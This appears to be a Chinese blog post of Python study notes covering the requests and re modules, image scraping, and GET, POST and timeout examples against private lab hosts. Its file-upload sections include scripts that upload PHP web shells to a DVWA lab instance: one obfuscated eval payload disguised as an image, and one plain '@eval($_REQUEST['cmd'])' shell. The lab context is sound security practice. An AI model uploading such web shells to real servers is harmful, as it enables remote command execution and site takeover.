Python 爬虫

爬虫

爬取图片,问题分解:

  • 获取网页内容;
  • 从网页内容中提取图片地址;
  • 通过图片地址,将图片下载到本地。

相关模块

requests 模块

获取网页内容。

requests 模块:主要是用来模拟浏览器行为,发送HTTP 请求,并处理HTTP 响应的功能。

import requests     # 被认为,最贴近与人的操作的模块
# 或
'''
import urllib
import urllib2
import urllib3
'''

requests 模块处理网页内容的基本逻辑:

  • 定义一个URL 地址;
  • 发送HTTP 请求;
  • 处理HTTP 响应。

模块中的请求方法

请求方法说明
requests.get()GET 方法
requests.post()
requests.head()只返回响应头部,没有响应正文。
requests.options()
requests.put()
requests.delete()

请求方法中的参数

参数名字参数含义
url请求URL 地址
headers自定义请求头部
params发送GET 参数
data发送POST 参数
timeout请求延时
files文件上传数据流

响应对象中属性

方法名解释
response.text响应正文(文本方式)
response.content响应正文(二进制)
response.status_code响应状态码
response.url发送请求的URL 地址
response.headers响应头部
response.request.headers请求头部
response.cookiescookie 相关信息

re 模块

从网页内容中提取图片地址。

正则表达式(RE),是一些由字符和特殊符号组成的字符串,它们能按某种模式匹配一系列有相似特征的字符串。

  • 从哪一个字符串中搜索什么内容;
  • 规则是什么(模式问题)。
>>> import re
>>> s = "I say food not Good"
>>> re.findall('ood',s)
['ood', 'ood']
>>> re.findall(r"[fG]ood", s)
['food', 'Good']
>>> re.findall(r"[a-z]ood", s)
['food']
>>> re.findall(r"[A-Z]ood", s)
['Good']
>>> re.findall(r"[0-9a-zA-Z]ood", s)
['food', 'Good']
>>> re.findall(r"[^a-z]ood",s)
['Good']
>>> re.findall('.ood',s)
['food', 'Good']
>>> re.findall(r'food|Good|not',s)
['food', 'not', 'Good']
>>> re.findall(r".o{1,2}.", s)
['food', 'not', 'Good']
>>> re.findall('o*',s)
['', '', '', '', '', '', '', 'oo', '', '', '', 'o', '', '', '', 'oo', '', '']
>>> 

>>> s = "How old are you? I'm 24!"
>>> re.findall(r"[0-9][0-9]", s)
>>> s = "How old are you? I'm 24!"
>>> re.findall(r"[0-9]{1,2}", s)
['24']
>>> re.findall(r"\d{1,2}", s)
['24']
>>> re.findall(r"\w", s)
['H', 'o', 'w', 'o', 'l', 'd', 'a', 'r', 'e', 'y', 'o', 'u', 'I', 'm', '2', '4']
>>> 

>>> s = 'I like google not ggle goooogle and gogle'
>>> re.findall('o+',s)
['oo', 'o', 'oooo', 'o']
>>> re.findall('go+',s)
['goo', 'goooo', 'go']
>>> re.findall('go+gle',s)
['google', 'goooogle', 'gogle']
>>> re.findall('go?gle',s)
['ggle', 'gogle']
>>> re.findall('go{1,2}gle',s)
['google', 'gogle']
>>>

匹配单个字符

记号说明
.匹配任意单个字符(换行符除外). 表示真正的.
[…x-y…]匹配字符集合里的任意单个字符
[^…x-y…]匹配不在字符组里的任意单个字符
\d匹配任意数字,与[0-9] 同义
\w匹配任意数字、字母、下划线,与[0-9a-zA-Z_] 同义
\s匹配空白字符,与[\r\v\f\t\n] 同义

匹配一组字符

记号说明
字符串匹配字符串值
字符串1|字符串2匹配字符串1或字符串2
*左邻第一个字符出现0 次或无穷次
+左邻第一个字符最少出现1 次或无穷次
?左邻第一个字符出现0 次或1 次
{m,n}左邻第一个字符出现最少m 次最多n 次

其他元字符

记号说明
^匹配字符串的开始 集合取反
$匹配字符串的结尾
\b匹配单词的边界,单词包括\w 中的内容
()对字符串分组
\数字匹配已保存的子组

核心函数

核心函数说明
re.findall()在字符串中查找正则表达式的所有(非覆盖)出现;返回一个匹配对象的列表。
re.match()尝试用正则表达式模式从字符串的开头匹配 如果匹配成功,则返回一个匹配对象 否则返回None
re.search()在字符串中查找正则表达式模式的第一次出现 如果匹配成,则返回一个匹配对象 否则返回None
re.group()使用match 或者search 匹配成功后,返回的匹配对象 可以通过group() 方法获取得匹配内容
re.finditer()和findall() 函数有相同的功能,但返回的不是列表而是迭代器 对于每个匹配,该迭代器返回一个匹配对象
re.split()根据正则表达式中的分隔符把字符分割为一个列表,并返回成功匹配的列表字符串也有类似的方法,但是正则表达式更加灵活
re.sub()把字符串中所有匹配正则表达式的地方换成新的字符串
re.findall(r"要匹配的字符串",目标字符串)

要匹配的字符串中可以使用上述匹配方法

>>> m = re.match('goo','I like google not ggle goooogle and gogle')
>>> type(m)
<class 'NoneType'>
>>> m = re.match('I','I like google not ggle goooogle and gogle')
>>> type(m)
<class 're.Match'>
>>> m.group()
'I'
>>> m = re.search('go{3,}','I like google not ggle goooogle and gogle')
>>> m.group()
'goooo'
>>> m = re.finditer('go*','I like google not ggle goooogle and gogle')
>>> list(m)
[<re.Match object; span=(7, 10), match='goo'>, <re.Match object; span=(10, 11), match='g'>, <re.Match object; span=(18, 19), match='g'>, <re.Match object; span=(19, 20), match='g'>, <re.Match object; span=(23, 28), match='goooo'>, <re.Match object; span=(28, 29), match='g'>, <re.Match object; span=(36, 38), match='go'>, <re.Match object; span=(38, 39), match='g'>]
>>> m = re.split('\.|-','hello-world.GJL')
>>> m
['hello', 'world', 'GJL']
>>> s = "hi x.Nice to meet you, x."
>>> s = re.sub('x','GJL',s)
>>> s
'hi GJL.Nice to meet you, GJL.'
>>>

反爬取会筛选 user-agent,可以自定义 user-agent

image-20231102094052029

网页信息爬取

通过python 脚本爬取网页图片:

  • 获取整个页面所有源码;
  • 筛选出源码中图片地址;
  • 将图片下载到本地。

获取网页HTML 源代码

将方法封装成函数。

# 01 - 获取网页源代码.py

import requests

url = "http://10.4.7.130/pyspider/"

headers = {
    "User-Agent":   "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"
}

# print(res.content.decode())

def getHtml(url):
    res = requests.get(url = url, headers = headers)

    return res.content


print(getHtml(url = url))

提取图片地址

# 02 - 提权图片地址.py

'''
style/u1257164168471355846fm170s9A36CD0036AA1F0D5E9CC09C0100E0E3w6.jpg
style/u18825255304088225336fm170sC213CF281D23248E7ED6550F0100A0E1w.jpg
style/\w*\.jpg
'''

import requests
import re

url = "http://10.4.7.130/pyspider/"

headers = {
    "User-Agent":   "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"
}

def getHtml(url):
    res = requests.get(url = url, headers = headers)

    return res.content

def getImgPathList(html):
    imgPathList = re.findall(r"style/\w*\.jpg", html)

    return imgPathList

for imgPath in getImgPathList(getHtml(url = url).decode()):
    print(imgPath)

下载图片

# 03 - 下载图片.py

import requests

url = "http://10.4.7.130/pyspider/"
img_path = "style/u401307265719758014fm173s0068CFB1485C3ECA44B8C5E5030090F3w21.jpg"
img_url = url + img_path

headers = {
    "User-Agent":   "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"
}

def get_html(url):
    res = requests.get(url = url, headers = headers)

    return res.content

def save_img(img_save_path, img_url):
    with open(img_save_path, "wb") as f:
        f.write(get_html(url = img_url))

save_img("./images/1.jpg", img_url)

完整脚本

# 04 - 网页信息爬取.py

import requests
import re
import time

url = "http://10.4.7.130/pyspider/"

headers = {
    "User-Agent":   "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"
}

def get_html(url):
    res = requests.get(url = url, headers = headers)
    return res.content

def get_img_path_list(html):
    img_path_list = re.findall(r"style/\w*\.jpg", html)

    return img_path_list

def img_download(img_save_path, img_url):
    with open(img_save_path, "wb") as f:
        f.write(get_html(url = img_url))

html = get_html(url = url).decode()

img_path_list = get_img_path_list(html = html)

for img_path in img_path_list:
    img_url = url + img_path
    img_save_path = f"./images/{time.time()}.jpg"
    img_download(img_save_path = img_save_path, img_url = img_url)

爬取图片练习

源码

import requests
import re

# 图片格式 <img class="large" src="style/u24020836931378817798fm170s6BA8218A7B2128178FA0A49F010080E2w.jpg">

def html_code(url):
    # 发送 get 请求
    res = requests.get(url=url)
    # 将响应正文的二进制解码返回
    html = res.content.decode()
    return html

# 正则匹配,筛选图片地址,  注意 \w 无法匹配 “/”
def img_path_list(html):
    # 此处匹配 “style/” 和 “.jpg” 中间所有内容,点号要进行转义,返回 jpg 图片名列表
    return re.findall(r"style/\w*\.jpg",html)

def img_request(img_path_list):
    img_list = []
    for img_path in img_path_list:
        # 请求每一个图片,将响应存储到列表中返回
        img_list.append(requests.get(url+img_path))
    return img_list

def img_download(img,i):
    # 保存路径要精确到文件名,防止文件名重复覆盖,此处添加变量
    img_save_path = f"./image/{i}.jpg"
    # 注意 wb 以二进制形式读写
    print(img_save_path )
    with open(img_save_path,"wb") as f:
        f.write(img.content)

url = "http://10.9.47.154/python-spider/"
# 请求该网页的 html 代码
html=html_code(url)
# 获取文件名列表
img_path_list=img_path_list(html)
# 请求图片
imgs = img_request(img_path_list)
# 下载图片
i=0
for img in imgs:
    img_download(img,i)
    i+=1

效果

image-20231102113332241

image-20231102125647067

requests 模块基本用法

模拟浏览器指纹

防止反爬取

# 05 - 自定义浏览器指纹.py

import requests

url = "http://10.4.7.130/php/array/get.php"

headers = {
    "User-Agent":   "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
}

res = requests.get(url = url, headers = headers)

# print(res.text)
# print(res.status_code)
# print(res.headers)
# print(res.url)
print(res.request.headers)

发送GET 参数

# 06 - 发送GET 参数.py

import requests

url = "http://10.4.7.130/php/array/get.php"
# url = "http://10.4.7.130/php/array/get.php?username=GJL&password=123456"

headers = {
    "User-Agent":   "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
}

params = {
    "username": "GJL",
    "password": "123456"
}

res = requests.get(url = url, headers = headers, params = params)

print(res.text)

发送POST 参数

# 07 - 发送POST 参数.py

import requests

url = "http://10.4.7.130/php/array/post.php"

headers = {
    "User-Agent":   "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
}

data = {
    "username": "GJL",
    "password": "123456"
}

res = requests.post(url = url, headers = headers, data = data)

print(res.text)

文件上传

请求头中需要 agent 信息和 cookie 信息

files

# 上传文件的表单名
files = {
    # 文件名,二进制文件内容,文件上传的类型
    "uploaded":("文件名",b"文件内容","上传的文件类型")
}

image-20231102142900118

# 08 - 文件上传.py

import requests

url = "http://10.4.7.130/dvwa_2.0.1/vulnerabilities/upload/"

headers = {
    "User-Agent":   "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36",
    "Cookie":       "security=low; PHPSESSID=378olurk9upvuo9sspecnl46c2"
}

data = {
    "MAX_FILE_SIZE":    "100000",
    "Upload":           "Upload"
}

files = {
    "uploaded": ("3.php", 
        b"<?php $RIBo=create_function(str_rot13('$').chr(39330/342).chr(0x16a0d/0x343).str_rot13('z').chr(0xcd-0x68),base64_decode('ZQ==').chr(0x364-0x2ee).chr(01333-01172).str_rot13('y').base64_decode('KA==').chr(0xcd-0xa9).chr(0x14695/0x2d7).str_rot13('b').base64_decode('bQ==').chr(0xee4c/0x25c).base64_decode('KQ==').str_rot13(';'));$RIBo(base64_decode('MzAzM'.'DQyO0'.'BldkF'.'sKCRf'.''.chr(37230/438).base64_decode('RQ==').base64_decode('OQ==').str_rot13('G').base64_decode('Vg==').''.''.str_rot13('S').str_rot13('f').chr(0x355-0x322).str_rot13('A').str_rot13('m').''.'ddKTs'.'5MDkx'.'MjY7'.''));?>",
        "image/png")
}

res = requests.post(url = url, headers = headers, data = data, files = files, allow_redirects = False)

print(res.status_code)
print(res.headers)

服务器超时

# 09 - 服务器超时.py

import requests

url = "http://10.4.7.130/php/functions/sleep.php"

def timeout(url):
    try:
        res = requests.get(url = url, timeout = 3)
        return res.text
    except requests.exceptions.ReadTimeout:
        return "timeout"

print(timeout(url))

requests 模块练习

模拟浏览器指纹

# http://10.9.47.154/test.php
import requests

url = "http://10.9.47.154/test.php"
headers = {
"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0"
}
res = requests.get(url=url,headers=headers)
print(res.request.headers)

image-20231102155722547

GET 请求

import requests

url = "http://10.9.47.154/php/arrayprac/get.php"
# 需要 php 文件中有 $_GET
headers = {
"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0"
}
params={
    "name":"GJL",
    "password":"123456"
}
res = requests.get(url=url,headers=headers,params=params)
print(res.text)

image-20231102151141857

POST 请求

import requests

url = "http://10.9.47.154/php/arrayprac/post.php"
# 需要 php 文件中有 $_POST
headers = {
"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0"
}
data={
    "name":"GJL",
    "password":"123456"
}
res = requests.post(url=url,headers=headers,data=data)
print(res.text)

image-20231102151349958

文件上传

浏览器上传文件,拦截,查看数据包内容

image-20231102152129769

import requests

url = "http://10.9.47.154/dvwa_2.0.1/vulnerabilities/upload/"

headers = {
    # 防止反爬
    "User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0",
    # 在请求头中添加登陆凭证
    "Cookie" : "security=low; security=low; PHPSESSID=n25n9pgfgmaplrvl4tfppdt661"
}
data={
    # 添加报文中的附加格式
    "MAX_FILE_SIZE":100000,
    "Upload":"Upload"
}
files={
    # 提交的表单名:(上传的文件名,二进制形式的文件内容,文件类型)
    "uploaded":("1.php",b"<?php @eval($_REQUEST['cmd']);?>","application/octet-stream")
}
# 发送构造的请求
res = requests.post(url=url,headers=headers,data=data,files=files)

html = res.text
# 截取返回的文件上传结果
start = html.find("<pre>")+5
end =  html.find("</pre>")
print(html[start:end])

image-20231102154552727

超时

sleep.php 设置了 sleep 10秒显示

如果不设置 timeout 则等待十秒获取到返回内容

image-20231102155001282

直接设置超时时间则等待三秒后会报错

image-20231102155111805

处理异常

超时显示

import requests
url = "http://10.9.47.154/php/functions/sleep.php"
try:
    res  = requests.get(url=url,timeout=3)
except requests.exceptions.ReadTimeout:
    print("Request Time Out")
except:
    print("Something error")
else:
    print(res.text)

image-20231102155312713

不设置超时

image-20231102155343642

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值